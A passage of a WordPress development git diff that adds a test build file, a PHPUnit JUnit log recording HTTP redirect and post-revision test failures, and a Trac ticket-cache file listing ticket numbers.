the command line, not via a web server. diff --git a/tests/build.xml b/tests/build.xml new file mode 100644 index 0000000000..f770794861 --- /dev/null +++ b/tests/build.xml @@ -0,0 +1,15 @@ + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/tests/build/logs/junit.xml b/tests/build/logs/junit.xml new file mode 100644 index 0000000000..a9cab850f2 --- /dev/null +++ b/tests/build/logs/junit.xml @@ -0,0 +1,2057 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Tests_HTTP_curl::test_post_redirect_to_method_300 +Failed asserting that two strings are equal. +--- Expected ++++ Actual +@@ @@ +-'POST' ++'Redirect 5 of 5 is FINAL.<br/>GET['rt'] = Total times to redirect. Defaults to 5.<br />GET['r'] = Current redirection. Defaults to 0.<br /><a href='http://api.wordpress.org/core/tests/1.0/redirection.php?source=true'>View Source</a>' + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:205 + + + + Tests_HTTP_curl::test_ip_url_with_host_header +Failed asserting that two strings are equal. +--- Expected ++++ Actual +@@ @@ +-'PASS' ++'Redirect 0 of 5' + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:241 + + + + Tests_HTTP_curl::test_multiple_location_headers +Failed asserting that 'http://api.wordpress.org/core/tests/1.0/redirection.php?rt=5&r=1' is of type "array". + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:254 + + + + + + + + + + + + + + + + + + + + Tests_HTTP_fsockopen::test_post_redirect_to_method_300 +Failed asserting that two strings are equal. +--- Expected ++++ Actual +@@ @@ +-'POST' ++'Redirect 5 of 5 is FINAL.<br/>GET['rt'] = Total times to redirect. Defaults to 5.<br />GET['r'] = Current redirection. Defaults to 0.<br /><a href='http://api.wordpress.org/core/tests/1.0/redirection.php?source=true'>View Source</a>' + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:205 + + + + Tests_HTTP_fsockopen::test_ip_url_with_host_header +Failed asserting that two strings are equal. +--- Expected ++++ Actual +@@ @@ +-'PASS' ++'Redirect 0 of 5' + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:241 + + + + Tests_HTTP_fsockopen::test_multiple_location_headers +Failed asserting that 'http://api.wordpress.org/core/tests/1.0/redirection.php?rt=5&r=1' is of type "array". + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:254 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Tests_HTTP_streams::test_post_redirect_to_method_300 +Failed asserting that two strings are equal. +--- Expected ++++ Actual +@@ @@ +-'POST' ++'Redirect 5 of 5 is FINAL.<br/>GET['rt'] = Total times to redirect. Defaults to 5.<br />GET['r'] = Current redirection. Defaults to 0.<br /><a href='http://api.wordpress.org/core/tests/1.0/redirection.php?source=true'>View Source</a>' + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:205 + + + + Tests_HTTP_streams::test_ip_url_with_host_header +Failed asserting that two strings are equal. +--- Expected ++++ Actual +@@ @@ +-'PASS' ++'Redirect 0 of 5' + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:241 + + + + Tests_HTTP_streams::test_multiple_location_headers +Failed asserting that 'http://api.wordpress.org/core/tests/1.0/redirection.php?rt=5&r=1' is of type "array". + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/http/base.php:254 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Tests_Post_Revisions::test_revision_dont_save_revision_if_unchanged +Failed asserting that actual size 4 matches expected size 3. + +/Users/nacin/Sites/develop.svn.wordpress.org/tests/tests/post/revisions.php:83 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/tests/data/.trac-ticket-cache.core.trac.wordpress.org b/tests/data/.trac-ticket-cache.core.trac.wordpress.org new file mode 100644 index 0000000000..04edf67b38 --- /dev/null +++ b/tests/data/.trac-ticket-cache.core.trac.wordpress.org @@ -0,0 +1,3795 @@ +¿id +4337 +5034 +5809 +7580 +8910 +9064 +9510 +9547 +9568 +10041 +10364 +10511 +11334 +12302 +13069 +13158 +13651 +13780 +14134 +14201 +14485 +15256 +15366 +15919 +16240 +16284 +16606 +17689 +18738 +19023 +22876 +22981 +24165 +24551 +761 +1914 +2531 +2691 +2702 +2877 +3052 +3260 +3329 +3398 +3491 +3567 +3632 +3670 +3833 +3842 +4004 +4010 +4027 +4116 +4221 +4253 +4328 +4332 +4463 +4518 +4555 +4575 +4711 +4893 +4916 +4965 +4969 +5031 +5117 +5120 +5130 +5161 +5172 +5235 +5250 +5252 +5305 +5310 +5358 +5461 +5678 +5692 +5725 +5842 +5915 +5918 +5932 +5942 +5953 +5998 +6106 +6109 +6122 +6286 +6297 +6331 +6342 +6369 +6379 +6393 +6405 +6425 +6430 +6479 +6492 +6531 +6536 +6619 +6698 +6768 +6778 +6814 +6819 +6822 +6829 +6860 +6939 +6969 +6978 +7030 +7045 +7051 +7054 +7061 +7092 +7098 +7231 +7244 +7267 +7301 +7361 +7394 +7402 +7422 +7463 +7491 +7543 +7604 +7605 +7615 +7634 +7644 +7695 +7723 +7740 +7756 +7795 +7797 +7810 +7813 +7845 +7857 +7859 +7965 +7993 +8050 +8071 +8119 +8214 +8243 +8296 +8298 +8455 +8470 +8492 +8532 +8578 +8592 +8593 +8599 +8648 +8722 +8733 +8754 +8755 +8775 +8822 +8828 +8833 +8874 +8885 +8905 +8911 +8912 +8923 +8973 +8984 +8994 +9025 +9057 +9102 +9117 +9153 +9170 +9207 +9227 +9232 +9256 +9257 +9296 +9324 +9378 +9383 +9437 +9460 +9470 +9513 +9571 +9604 +9611 +9640 +9642 +9666 +9678 +9679 +9716 +9719 +9775 +9777 +9785 +9788 +9818 +9820 +9824 +9825 +9841 +9860 +9864 +9873 +9875 +9902 +9911 +9927 +9930 +9931 +9978 +9993 +10005 +10033 +10046 +10055 +10086 +10141 +10151 +10154 +10158 +10161 +10177 +10180 +10201 +10203 +10205 +10230 +10237 +10248 +10249 +10259 +10260 +10267 +10268 +10303 +10373 +10377 +10384 +10390 +10404 +10414 +10422 +10424 +10441 +10457 +10458 +10476 +10480 +10489 +10514 +10535 +10543 +10545 +10558 +10569 +10587 +10596 +10597 +10652 +10653 +10660 +10663 +10666 +10676 +10690 +10699 +10702 +10722 +10726 +10741 +10743 +10752 +10762 +10764 +10770 +10786 +10787 +10790 +10819 +10823 +10831 +10832 +10834 +10846 +10850 +10852 +10856 +10883 +10884 +10886 +10902 +10931 +10935 +10946 +10947 +10948 +10950 +10955 +10968 +10970 +10975 +10976 +10980 +10984 +10988 +10989 +11003 +11009 +11023 +11049 +11053 +11058 +11060 +11078 +11093 +11095 +11101 +11113 +11151 +11160 +11164 +11175 +11178 +11200 +11207 +11210 +11215 +11229 +11235 +11248 +11282 +11286 +11302 +11303 +11311 +11319 +11325 +11328 +11338 +11344 +11359 +11360 +11375 +11376 +11381 +11384 +11387 +11398 +11414 +11418 +11438 +11465 +11469 +11472 +11477 +11515 +11531 +11549 +11566 +11571 +11576 +11581 +11585 +11598 +11616 +11623 +11642 +11674 +11678 +11683 +11692 +11694 +11697 +11699 +11705 +11717 +11725 +11727 +11733 +11734 +11738 +11740 +11800 +11813 +11823 +11826 +11847 +11856 +11863 +11869 +11884 +11888 +11890 +11895 +11898 +11903 +11905 +11931 +11946 +11950 +11957 +11959 +11986 +11993 +12002 +12009 +12013 +12014 +12016 +12017 +12030 +12031 +12032 +12033 +12036 +12043 +12056 +12061 +12084 +12097 +12104 +12107 +12120 +12133 +12134 +12145 +12154 +12208 +12219 +12223 +12227 +12235 +12238 +12254 +12257 +12264 +12267 +12273 +12286 +12295 +12313 +12322 +12336 +12340 +12342 +12350 +12354 +12363 +12368 +12370 +12392 +12400 +12402 +12405 +12431 +12432 +12456 +12461 +12475 +12477 +12480 +12491 +12493 +12494 +12502 +12518 +12521 +12532 +12538 +12539 +12563 +12567 +12578 +12582 +12584 +12609 +12629 +12634 +12641 +12657 +12670 +12671 +12682 +12684 +12690 +12696 +12702 +12705 +12706 +12717 +12718 +12719 +12720 +12721 +12722 +12725 +12726 +12729 +12756 +12779 +12799 +12801 +12819 +12821 +12825 +12826 +12832 +12839 +12865 +12877 +12885 +12890 +12900 +12905 +12929 +12934 +12939 +12940 +12945 +12955 +12960 +12976 +12981 +12982 +12986 +12991 +12993 +12996 +13005 +13011 +13014 +13041 +13051 +13052 +13071 +13078 +13091 +13100 +13103 +13169 +13208 +13218 +13222 +13227 +13235 +13237 +13239 +13247 +13258 +13265 +13266 +13269 +13273 +13310 +13339 +13340 +13363 +13365 +13372 +13377 +13382 +13392 +13412 +13416 +13418 +13425 +13429 +13433 +13436 +13450 +13459 +13461 +13473 +13493 +13500 +13502 +13504 +13509 +13516 +13522 +13528 +13529 +13548 +13554 +13575 +13576 +13580 +13592 +13606 +13648 +13655 +13659 +13661 +13689 +13691 +13694 +13701 +13728 +13743 +13752 +13765 +13767 +13771 +13779 +13792 +13816 +13820 +13821 +13822 +13837 +13841 +13857 +13867 +13874 +13875 +13905 +13909 +13910 +13919 +13922 +13924 +13926 +13928 +13937 +13939 +13941 +13949 +13972 +13979 +13983 +13989 +13992 +13998 +14011 +14017 +14020 +14028 +14036 +14039 +14041 +14049 +14050 +14060 +14077 +14078 +14087 +14096 +14099 +14102 +14106 +14108 +14110 +14113 +14115 +14125 +14126 +14132 +14137 +14148 +14159 +14162 +14164 +14169 +14172 +14179 +14188 +14195 +14206 +14207 +14209 +14215 +14224 +14244 +14254 +14268 +14273 +14279 +14282 +14290 +14302 +14305 +14308 +14310 +14325 +14331 +14333 +14341 +14343 +14361 +14363 +14364 +14366 +14368 +14370 +14373 +14375 +14380 +14393 +14397 +14399 +14401 +14408 +14412 +14414 +14424 +14432 +14439 +14440 +14445 +14448 +14449 +14452 +14458 +14459 +14460 +14465 +14466 +14477 +14478 +14479 +14481 +14488 +14491 +14493 +14501 +14502 +14510 +14511 +14515 +14530 +14531 +14539 +14541 +14549 +14551 +14561 +14565 +14569 +14578 +14581 +14584 +14601 +14622 +14639 +14640 +14642 +14644 +14650 +14653 +14657 +14664 +14670 +14671 +14674 +14676 +14686 +14687 +14691 +14697 +14698 +14711 +14717 +14721 +14730 +14737 +14741 +14749 +14752 +14754 +14757 +14759 +14760 +14767 +14769 +14773 +14781 +14782 +14789 +14791 +14792 +14798 +14804 +14808 +14809 +14819 +14824 +14825 +14849 +14851 +14853 +14855 +14856 +14858 +14862 +14867 +14873 +14877 +14881 +14884 +14888 +14890 +14893 +14900 +14901 +14902 +14913 +14932 +14938 +14941 +14946 +14949 +14955 +14958 +14966 +14969 +14975 +14979 +14981 +14983 +14986 +14987 +14988 +14991 +14994 +15001 +15004 +15006 +15015 +15029 +15030 +15031 +15033 +15034 +15046 +15058 +15060 +15068 +15069 +15072 +15086 +15101 +15110 +15115 +15139 +15145 +15148 +15149 +15158 +15202 +15204 +15214 +15217 +15219 +15230 +15237 +15249 +15250 +15251 +15261 +15264 +15289 +15309 +15311 +15324 +15335 +15337 +15349 +15355 +15367 +15381 +15384 +15385 +15389 +15394 +15406 +15409 +15417 +15424 +15448 +15457 +15459 +15466 +15490 +15499 +15508 +15513 +15514 +15515 +15516 +15520 +15533 +15534 +15539 +15550 +15551 +15565 +15576 +15583 +15588 +15594 +15595 +15606 +15610 +15619 +15626 +15631 +15633 +15636 +15637 +15642 +15645 +15646 +15648 +15650 +15655 +15657 +15659 +15667 +15674 +15675 +15677 +15691 +15694 +15697 +15706 +15719 +15731 +15732 +15738 +15741 +15760 +15761 +15765 +15769 +15782 +15783 +15784 +15790 +15796 +15800 +15801 +15805 +15807 +15811 +15819 +15827 +15828 +15833 +15837 +15838 +15846 +15847 +15855 +15860 +15861 +15865 +15905 +15906 +15907 +15918 +15921 +15924 +15926 +15928 +15929 +15930 +15936 +15942 +15943 +15946 +15949 +15950 +15953 +15955 +15956 +15957 +15963 +15965 +15971 +15977 +15993 +16001 +16009 +16010 +16012 +16020 +16022 +16024 +16025 +16026 +16031 +16055 +16057 +16075 +16077 +16096 +16101 +16105 +16106 +16107 +16109 +16116 +16118 +16122 +16125 +16126 +16133 +16134 +16135 +16147 +16148 +16150 +16156 +16158 +16162 +16164 +16167 +16173 +16180 +16182 +16183 +16185 +16191 +16201 +16203 +16204 +16216 +16219 +16223 +16230 +16235 +16239 +16243 +16251 +16252 +16264 +16268 +16271 +16280 +16282 +16283 +16285 +16291 +16293 +16294 +16301 +16310 +16318 +16323 +16328 +16330 +16339 +16343 +16345 +16346 +16365 +16369 +16375 +16379 +16382 +16383 +16392 +16395 +16396 +16398 +16399 +16400 +16401 +16404 +16408 +16410 +16413 +16414 +16415 +16418 +16420 +16425 +16428 +16430 +16431 +16434 +16435 +16437 +16443 +16445 +16448 +16451 +16460 +16462 +16468 +16470 +16471 +16472 +16475 +16477 +16478 +16482 +16483 +16491 +16492 +16495 +16496 +16497 +16502 +16504 +16509 +16512 +16516 +16518 +16519 +16524 +16550 +16557 +16567 +16568 +16576 +16578 +16581 +16584 +16589 +16594 +16603 +16612 +16615 +16625 +16632 +16635 +16645 +16648 +16651 +16668 +16672 +16677 +16683 +16686 +16691 +16698 +16705 +16706 +16707 +16718 +16719 +16725 +16731 +16734 +16745 +16747 +16750 +16753 +16754 +16755 +16756 +16758 +16762 +16770 +16773 +16774 +16778 +16779 +16781 +16782 +16784 +16787 +16788 +16790 +16792 +16793 +16794 +16802 +16805 +16808 +16809 +16817 +16819 +16820 +16828 +16830 +16832 +16833 +16839 +16840 +16841 +16843 +16845 +16849 +16853 +16854 +16856 +16858 +16859 +16860 +16863 +16864 +16865 +16867 +16870 +16872 +16875 +16876 +16880 +16881 +16882 +16883 +16884 +16886 +16891 +16894 +16895 +16903 +16906 +16907 +16908 +16909 +16910 +16911 +16914 +16916 +16919 +16922 +16925 +16929 +16934 +16935 +16940 +16942 +16943 +16944 +16945 +16946 +16949 +16953 +16956 +16957 +16963 +16971 +16972 +16973 +16976 +16979 +16980 +16982 +16985 +16987 +16989 +16990 +16993 +16995 +17002 +17005 +17010 +17015 +17019 +17020 +17022 +17023 +17025 +17026 +17027 +17036 +17037 +17039 +17047 +17052 +17061 +17065 +17068 +17069 +17071 +17072 +17077 +17078 +17088 +17092 +17093 +17095 +17105 +17115 +17128 +17133 +17138 +17142 +17146 +17150 +17157 +17159 +17164 +17168 +17170 +17179 +17181 +17183 +17185 +17191 +17199 +17201 +17209 +17210 +17219 +17221 +17227 +17235 +17236 +17246 +17247 +17249 +17253 +17254 +17255 +17261 +17262 +17268 +17270 +17275 +17296 +17298 +17301 +17302 +17326 +17328 +17337 +17340 +17360 +17365 +17370 +17374 +17375 +17376 +17379 +17381 +17382 +17387 +17388 +17391 +17394 +17397 +17398 +17409 +17413 +17427 +17433 +17439 +17442 +17445 +17447 +17450 +17451 +17453 +17455 +17460 +17470 +17472 +17478 +17482 +17487 +17491 +17505 +17516 +17517 +17525 +17526 +17541 +17542 +17545 +17547 +17551 +17552 +17557 +17571 +17580 +17584 +17590 +17592 +17594 +17595 +17604 +17607 +17609 +17615 +17619 +17626 +17630 +17632 +17635 +17636 +17642 +17646 +17653 +17661 +17675 +17680 +17698 +17703 +17704 +17709 +17714 +17718 +17723 +17725 +17736 +17737 +17763 +17764 +17766 +17767 +17771 +17778 +17783 +17785 +17793 +17800 +17807 +17812 +17817 +17821 +17834 +17847 +17851 +17852 +17853 +17856 +17857 +17861 +17862 +17864 +17866 +17877 +17884 +17890 +17891 +17902 +17904 +17905 +17906 +17913 +17916 +17917 +17920 +17923 +17924 +17928 +17948 +17951 +17956 +17957 +17959 +17964 +17981 +17993 +17999 +18002 +18003 +18007 +18010 +18023 +18025 +18030 +18033 +18035 +18037 +18039 +18042 +18043 +18048 +18056 +18060 +18067 +18070 +18075 +18079 +18081 +18084 +18087 +18088 +18097 +18101 +18102 +18105 +18106 +18117 +18118 +18132 +18134 +18136 +18143 +18161 +18162 +18163 +18165 +18166 +18169 +18171 +18172 +18179 +18184 +18186 +18188 +18190 +18191 +18199 +18200 +18209 +18210 +18218 +18222 +18231 +18232 +18239 +18242 +18243 +18244 +18245 +18249 +18254 +18258 +18264 +18266 +18271 +18272 +18275 +18281 +18282 +18285 +18286 +18287 +18289 +18292 +18296 +18297 +18298 +18301 +18302 +18306 +18307 +18315 +18321 +18322 +18324 +18325 +18326 +18327 +18351 +18356 +18357 +18360 +18362 +18368 +18375 +18385 +18386 +18391 +18395 +18396 +18399 +18400 +18402 +18412 +18413 +18417 +18418 +18423 +18446 +18448 +18449 +18450 +18466 +18471 +18474 +18476 +18480 +18488 +18489 +18493 +18496 +18499 +18501 +18502 +18503 +18504 +18505 +18513 +18517 +18518 +18521 +18523 +18525 +18527 +18530 +18532 +18547 +18548 +18549 +18550 +18553 +18556 +18558 +18561 +18563 +18569 +18574 +18575 +18577 +18586 +18588 +18590 +18594 +18596 +18602 +18603 +18604 +18609 +18613 +18614 +18617 +18623 +18627 +18630 +18632 +18641 +18650 +18653 +18655 +18658 +18660 +18661 +18671 +18672 +18676 +18679 +18680 +18681 +18682 +18684 +18685 +18692 +18694 +18701 +18703 +18705 +18707 +18709 +18710 +18714 +18724 +18729 +18730 +18731 +18733 +18734 +18736 +18743 +18746 +18748 +18754 +18762 +18769 +18773 +18776 +18777 +18778 +18786 +18788 +18790 +18791 +18792 +18798 +18801 +18803 +18804 +18814 +18816 +18817 +18820 +18821 +18823 +18824 +18826 +18828 +18829 +18833 +18835 +18836 +18842 +18843 +18848 +18850 +18851 +18852 +18857 +18859 +18860 +18877 +18885 +18893 +18896 +18897 +18900 +18909 +18910 +18926 +18934 +18937 +18943 +18944 +18946 +18947 +18950 +18951 +18953 +18954 +18959 +18962 +18968 +18979 +18981 +18988 +18995 +18997 +18998 +18999 +19008 +19011 +19012 +19017 +19019 +19028 +19031 +19038 +19041 +19044 +19055 +19063 +19064 +19065 +19068 +19069 +19085 +19094 +19097 +19100 +19109 +19110 +19112 +19115 +19120 +19121 +19124 +19130 +19135 +19140 +19159 +19168 +19181 +19188 +19192 +19197 +19198 +19200 +19203 +19205 +19206 +19207 +19211 +19225 +19227 +19238 +19239 +19243 +19247 +19256 +19257 +19264 +19268 +19270 +19272 +19278 +19286 +19288 +19291 +19296 +19306 +19307 +19308 +19309 +19332 +19343 +19347 +19354 +19365 +19367 +19368 +19372 +19373 +19374 +19375 +19380 +19383 +19388 +19392 +19393 +19397 +19412 +19415 +19419 +19432 +19443 +19444 +19449 +19450 +19451 +19455 +19462 +19464 +19466 +19471 +19487 +19489 +19492 +19493 +19497 +19499 +19512 +19514 +19520 +19525 +19527 +19531 +19541 +19543 +19549 +19550 +19555 +19556 +19561 +19564 +19569 +19572 +19579 +19581 +19583 +19587 +19590 +19609 +19615 +19621 +19623 +19627 +19628 +19629 +19631 +19633 +19635 +19639 +19641 +19643 +19645 +19647 +19649 +19653 +19654 +19666 +19674 +19675 +19680 +19686 +19688 +19689 +19691 +19693 +19695 +19705 +19707 +19709 +19711 +19716 +19719 +19721 +19722 +19724 +19728 +19730 +19736 +19737 +19738 +19739 +19742 +19744 +19745 +19747 +19753 +19760 +19764 +19765 +19770 +19776 +19780 +19781 +19783 +19784 +19790 +19793 +19802 +19805 +19806 +19813 +19816 +19817 +19821 +19825 +19826 +19828 +19834 +19838 +19845 +19846 +19847 +19849 +19851 +19856 +19858 +19859 +19862 +19864 +19866 +19867 +19872 +19877 +19879 +19884 +19885 +19889 +19890 +19892 +19893 +19896 +19898 +19901 +19902 +19903 +19904 +19906 +19907 +19912 +19915 +19918 +19921 +19926 +19927 +19930 +19945 +19947 +19949 +19954 +19958 +19960 +19968 +19979 +19980 +19984 +19986 +19990 +19992 +19995 +19996 +19998 +20002 +20006 +20007 +20008 +20009 +20011 +20013 +20016 +20019 +20020 +20025 +20026 +20027 +20037 +20041 +20043 +20044 +20046 +20048 +20050 +20052 +20057 +20060 +20066 +20067 +20069 +20070 +20073 +20074 +20075 +20076 +20082 +20092 +20094 +20095 +20104 +20105 +20107 +20109 +20114 +20115 +20116 +20120 +20124 +20125 +20127 +20130 +20133 +20140 +20144 +20148 +20151 +20152 +20153 +20157 +20166 +20167 +20171 +20175 +20176 +20178 +20179 +20180 +20185 +20186 +20194 +20203 +20205 +20206 +20211 +20213 +20214 +20220 +20221 +20224 +20225 +20226 +20228 +20232 +20233 +20237 +20241 +20251 +20252 +20253 +20257 +20260 +20262 +20263 +20264 +20271 +20275 +20276 +20279 +20283 +20284 +20286 +20287 +20288 +20289 +20298 +20299 +20301 +20302 +20304 +20308 +20309 +20316 +20318 +20319 +20323 +20325 +20326 +20328 +20330 +20335 +20338 +20342 +20352 +20353 +20357 +20359 +20360 +20368 +20377 +20379 +20383 +20386 +20388 +20395 +20413 +20415 +20419 +20421 +20425 +20437 +20438 +20439 +20440 +20444 +20453 +20456 +20459 +20461 +20468 +20487 +20490 +20491 +20495 +20496 +20509 +20513 +20516 +20520 +20522 +20523 +20531 +20534 +20537 +20542 +20544 +20545 +20547 +20558 +20560 +20563 +20564 +20570 +20571 +20578 +20589 +20592 +20595 +20596 +20597 +20601 +20602 +20606 +20609 +20615 +20620 +20630 +20631 +20633 +20634 +20635 +20651 +20652 +20659 +20660 +20661 +20662 +20672 +20683 +20688 +20690 +20706 +20712 +20714 +20716 +20717 +20720 +20725 +20729 +20730 +20733 +20735 +20738 +20739 +20740 +20745 +20746 +20748 +20767 +20770 +20771 +20774 +20779 +20783 +20788 +20790 +20791 +20793 +20810 +20813 +20816 +20822 +20824 +20825 +20839 +20842 +20844 +20845 +20846 +20847 +20848 +20850 +20853 +20854 +20859 +20861 +20870 +20875 +20880 +20881 +20882 +20883 +20888 +20890 +20899 +20900 +20901 +20902 +20903 +20904 +20905 +20907 +20920 +20927 +20930 +20935 +20936 +20943 +20944 +20946 +20947 +20948 +20956 +20958 +20973 +20977 +20978 +20983 +20986 +20988 +21000 +21002 +21004 +21007 +21010 +21014 +21015 +21017 +21022 +21023 +21031 +21034 +21035 +21036 +21038 +21043 +21044 +21046 +21051 +21055 +21059 +21061 +21062 +21070 +21072 +21073 +21078 +21082 +21083 +21085 +21089 +21091 +21096 +21097 +21098 +21107 +21109 +21112 +21113 +21119 +21126 +21128 +21132 +21134 +21139 +21140 +21143 +21153 +21156 +21157 +21158 +21163 +21164 +21165 +21167 +21168 +21169 +21170 +21171 +21172 +21188 +21189 +21190 +21195 +21200 +21204 +21207 +21211 +21212 +21213 +21219 +21221 +21225 +21234 +21236 +21237 +21243 +21253 +21256 +21258 +21265 +21266 +21267 +21268 +21271 +21273 +21276 +21281 +21282 +21284 +21285 +21287 +21292 +21293 +21294 +21295 +21300 +21304 +21306 +21311 +21314 +21319 +21321 +21323 +21329 +21330 +21334 +21341 +21352 +21354 +21364 +21374 +21375 +21380 +21386 +21387 +21389 +21394 +21396 +21398 +21401 +21402 +21403 +21407 +21411 +21412 +21414 +21417 +21421 +21425 +21428 +21432 +21435 +21442 +21444 +21446 +21448 +21452 +21453 +21455 +21460 +21470 +21472 +21483 +21485 +21488 +21492 +21495 +21497 +21504 +21506 +21510 +21516 +21520 +21521 +21523 +21526 +21534 +21537 +21538 +21539 +21540 +21542 +21543 +21546 +21547 +21550 +21551 +21554 +21563 +21569 +21571 +21573 +21581 +21583 +21584 +21596 +21597 +21599 +21602 +21603 +21605 +21606 +21610 +21613 +21616 +21621 +21622 +21627 +21628 +21631 +21632 +21641 +21642 +21644 +21645 +21649 +21650 +21651 +21652 +21658 +21659 +21660 +21662 +21663 +21665 +21666 +21667 +21668 +21669 +21670 +21672 +21674 +21676 +21679 +21682 +21683 +21687 +21689 +21699 +21700 +21712 +21713 +21714 +21729 +21730 +21734 +21737 +21738 +21744 +21753 +21758 +21760 +21762 +21763 +21765 +21766 +21769 +21770 +21773 +21774 +21785 +21787 +21788 +21790 +21791 +21792 +21793 +21803 +21810 +21811 +21819 +21821 +21826 +21834 +21837 +21840 +21845 +21848 +21853 +21856 +21859 +21862 +21864 +21870 +21872 +21874 +21876 +21879 +21881 +21890 +21891 +21894 +21899 +21900 +21910 +21911 +21912 +21913 +21918 +21919 +21925 +21930 +21931 +21934 +21938 +21941 +21949 +21950 +21959 +21963 +21969 +21970 +21976 +21977 +21982 +21986 +21987 +21988 +21989 +21991 +21994 +21995 +21999 +22001 +22003 +22010 +22014 +22022 +22023 +22029 +22030 +22037 +22040 +22041 +22043 +22049 +22051 +22056 +22058 +22059 +22069 +22070 +22074 +22075 +22076 +22080 +22082 +22086 +22100 +22101 +22104 +22106 +22110 +22112 +22114 +22115 +22116 +22117 +22119 +22127 +22128 +22134 +22135 +22139 +22141 +22145 +22146 +22148 +22150 +22154 +22156 +22160 +22164 +22171 +22172 +22174 +22176 +22180 +22182 +22183 +22185 +22192 +22194 +22195 +22196 +22198 +22200 +22205 +22208 +22209 +22212 +22214 +22222 +22225 +22228 +22230 +22231 +22233 +22234 +22236 +22237 +22239 +22242 +22247 +22249 +22251 +22253 +22254 +22256 +22261 +22267 +22271 +22272 +22273 +22277 +22279 +22283 +22287 +22288 +22293 +22296 +22297 +22300 +22301 +22302 +22303 +22305 +22310 +22311 +22314 +22316 +22325 +22328 +22329 +22330 +22333 +22336 +22338 +22341 +22342 +22343 +22346 +22348 +22350 +22355 +22362 +22363 +22364 +22367 +22370 +22378 +22380 +22383 +22392 +22400 +22401 +22402 +22405 +22406 +22408 +22409 +22412 +22414 +22416 +22424 +22429 +22434 +22435 +22436 +22440 +22442 +22450 +22458 +22466 +22470 +22478 +22487 +22492 +22497 +22498 +22501 +22505 +22509 +22511 +22519 +22523 +22525 +22526 +22531 +22534 +22540 +22548 +22556 +22558 +22567 +22579 +22580 +22587 +22589 +22590 +22599 +22600 +22601 +22602 +22612 +22623 +22624 +22625 +22630 +22631 +22633 +22635 +22641 +22648 +22650 +22660 +22661 +22663 +22669 +22671 +22679 +22683 +22692 +22694 +22700 +22701 +22704 +22712 +22726 +22734 +22735 +22736 +22739 +22742 +22744 +22745 +22746 +22768 +22770 +22772 +22773 +22781 +22785 +22792 +22793 +22795 +22798 +22799 